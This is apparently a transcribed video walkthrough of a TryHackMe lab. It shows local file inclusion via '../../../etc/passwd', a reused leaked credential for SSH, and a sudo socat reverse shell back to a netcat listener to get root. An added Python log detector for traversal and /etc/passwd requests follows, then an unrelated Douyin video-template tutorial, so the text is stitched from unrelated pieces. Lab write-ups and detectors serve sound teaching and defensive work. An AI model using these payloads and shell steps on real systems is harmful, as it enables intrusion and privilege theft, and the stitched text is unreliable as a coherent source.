ping works, so that's not, that's clearly not it. So make it aggressive, let's see what we got. Now it loads, okay, what, whatever. "Hello world, welcome to my blog, it's currently in a very early stage, you can find some of the articles that I wrote, you can view the details of LFI attack or RFI attack, most common file that we can check is /etc/passwd." Huh, all right. So if I make our URL visible, let's go check out some of those articles. Yeah, article?name=lfiattack, so the name here looks to be the argument or the variable that's kind of being passed with HTTP, a simple HTTP GET variable, that is allowing us to select other files that are included in here, and that looks like they describe it here in this page. If you view the source it looks a little bit better, because looking at it in this code kind of really ruins everything, the newlines are gone. So $file equals the GET variable, used through PHP, and it will unsafely include the file, like include directory into file, that's how the syntax looks in PHP, and we've seen that probably in a lot of other videos, we've seen that before. So we can very, very much kind of climb the directory tree using the period period, or the dot dot, to move up parent directory, parent directory, parent directory, etc., etc. So this is super simple, kind of pretty easy. Looks like they offer another resource that's doing this as well, or explaining what this really is. Okay, there we go, and that gives us some code blocks to kind of read the PHP a little bit more. So let's just jump in and go ahead and view the source on any page that we might want to read. So we need to supply a value for that name, and let's climb the directory tree with ../../../ and we'll check out /etc/passwd. So there's some stuff in here, again we're gonna need to view the source, because we have these users displayed. Huh, at the bottom we see this one kind of commented out: falconfeast with rootpassword. That's pretty cheesy, maybe that is an
account we could use to log in, and SSH is open now that our nmap scan finally came back, so let's include this in our notes, paste that guy in here, and let's perform the LFI attack. Good, my face is not in the way just yet. Let's go ahead and grab this. So if we were running from our terminal, we could just simply curl that, and that will return the credentials that we just potentially found. And now let's SSH to that IP address with falconfeast as our username, and we know that the password should be rootpassword, which is peculiar. That did not work. Why did that not work? falconfeast at IP address? What, what, what? falconfeast, falconfeast, rootpassword. Does root have a password? Nothing except, what is that supposed to be? Is that the right IP address? Am I connecting to something that I had in a previous video? falconfeast, IP, okay, I was clearly using the wrong IP address as my environment variable. This is the problem of doing videos back to back, just trying to churn stuff out for you guys, trying to make you some good stuff, hopefully. I feel like I also lose a certain amount of quality when I'm trying to do a lot of these, it's like a quantity versus quality thing. Did I just say the same word twice? I feel like I did. Quality versus quantity. All right, so now we are SSH'd into that machine. Um, looks like we have our user flag here, so we can go ahead and cat that out, I'll spit that into our TryHackMe submission. Good, good, good. Also take note of that in our notes there, and now we also want to probably escalate our privileges to be root. We could run LinPEAS, but let's just verify, is there anything we can run with sudo? Looks like we can, we can run /usr/bin/socat without a password. So let's check GTFOBins, fantastic resource for doing malicious things, potentially malicious things, with kind of built-in binaries that we might see on a system. So socat can get a reverse shell, a bind shell, also sudo access. Okay, it has to have a connection back, we can just break it out, so let's fire up
our own terminal. Let's see what our IP address is, I'm still 10.8.9.112, and let's get a port going, so nc -lnvp 9999, and let's try to sudo /usr/bin/socat, so /usr/bin and then my forward slash to type in socat, and oh, wait a second, it's listening. I'm confused with what this is doing. It runs in privileged context and we will access the file system, escalate or maintain access, run file:`tty`,raw, oh, so it just like reads in standard input, is that what that does? 9999, and then I need to supply this. Oh, oh, maybe that syntax is what I should be supplying, not that. That kind of looks like it's just like listening. Can I do that, can I netcat to the machine IP? Is it binding? 10.10.157.245 9999, id, okay, he's just being a socket, that's not helpful for me. Let's spin our shell back up and let's modify that command that GTFOBins gave us, so we know to connect to 10.8.9.112 and our port that we are listening on on our attacking machine is 9999. So we now, "I am not allowed to preserve the environment", what does that mean? Tada, there we go, now have a root shell, now I am root. Let's try and stabilize the shell, as some formal pentest stuff. Do I have Python? print hello, you know what, print please subscribe, use a little shameless plug there. Python we do not have, how about python3? Tada, prints "please sub". This is completely useless because we have root, we don't need to do that, but whatever, let's stabilize that shell. We literally just need to go get the root flag, whatever. We have a clean shell and we can use our autocomplete and left and right arrow keys, so hey, it makes me happy, I hope it makes you happy too. There is our root flag, let's go ahead and submit that bad boy and call this machine done. So super simple technique, right? Just local file inclusion, for some reason inside of /etc/passwd there was a comment with some user credentials, and that account had some privilege escalation route and attack vector to become root, so
completely on that machine. That simple case of local file inclusion, you've seen it before, I'm sure, in tons of other videos, but this room just emphasizes it, showcases it, and highlights it. So hope you guys enjoyed watching. If you did, please press that like button and comment button, subscribe button, the bell button, the probably other buttons you can click too, and my face, like the little icon. Thanks for watching, everybody, I hate you, and after this I'm just gonna leave, I'm just gonna go. Thanks, thanks for watching.
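As an added defensive example, not code from the video or from the room: a detector that scans web-server access-log lines for the ?name=../../../etc/passwd style of request the video walks through, plus the URL-encoded, double-encoded and PHP stream-wrapper variants a defender would also want flagged. The log lines, IP addresses and parameter names below are constructed; only the Python standard library is used.

```python
"""Flag local-file-inclusion attempts in web access logs (added example,
not code from the video). Log lines are constructed in the common
"combined" format; IP addresses are placeholders."""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
INDICATORS = [  # checked in order; the first match names the finding
    ("wrapper", re.compile(r'(?i)^(?:php|file|data|expect)://')),   # PHP stream wrappers
    ("traversal", re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')),       # ../ or ..\ segment
    ("sensitive-path", re.compile(r'(?i)(?:^|/)etc/(?:passwd|shadow)')),
]

def decode_all(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded %252e%252e is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\0", "")  # drop null bytes once used to truncate paths

def classify(value: str) -> Optional[str]:
    """Name the LFI indicator in one decoded parameter value, or None."""
    return next((name for name, rx in INDICATORS if rx.search(value)), None)

def scan(lines):
    """Return (client, param, decoded value, indicator, status) per suspicious param."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        for param, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = decode_all(raw)       # parse_qsl already decoded one layer
            kind = classify(value)
            if kind:
                hits.append((client, param, value, kind, status))
    return hits

SAMPLE_LOG = [  # constructed: one benign request, then the patterns to catch
    '10.0.0.5 - - [10/Mar/2021:12:00:00 +0000] "GET /article?name=lfiattack HTTP/1.1" 200 1234',
    '10.0.0.9 - - [10/Mar/2021:12:00:05 +0000] "GET /article?name=../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Mar/2021:12:00:09 +0000] "GET /article?name=%252e%252e%252fetc%252fshadow HTTP/1.1" 200 17',
    '10.0.0.9 - - [10/Mar/2021:12:00:12 +0000] "GET /article?name=php://filter/resource=index HTTP/1.1" 200 900',
    '10.0.0.7 - - [10/Mar/2021:12:00:20 +0000] "GET /article?name=/etc/passwd HTTP/1.1" 200 2048',
]
```

A 200 status on a flagged request, as in the constructed lines, is the case to triage first: the include succeeded rather than being rejected.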

Ah, tug the necklace to change outfits, so many likes, try me, quick, find a necklace, hurry up and make me go viral. Oh, the haircut looks ugly. First shoot two video clips, then click the link at the bottom left of this video, tap "start creating with one click", and it will automatically jump to Xiaofeng's template; tap "use this template", add the two clips you just shot, tap "video crop" to adjust the video position, then tap "export" and share to Douyin with one click, so it won't get throttled. OK, look at the finished product, try me.
